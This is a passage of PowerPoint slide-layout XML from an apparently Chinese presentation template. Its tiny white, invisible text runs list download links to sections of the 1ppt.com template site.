              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout45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45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45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45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45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45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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout45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45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45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45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46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46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46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46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46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46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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout46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46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46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46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47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47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47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47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47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47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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
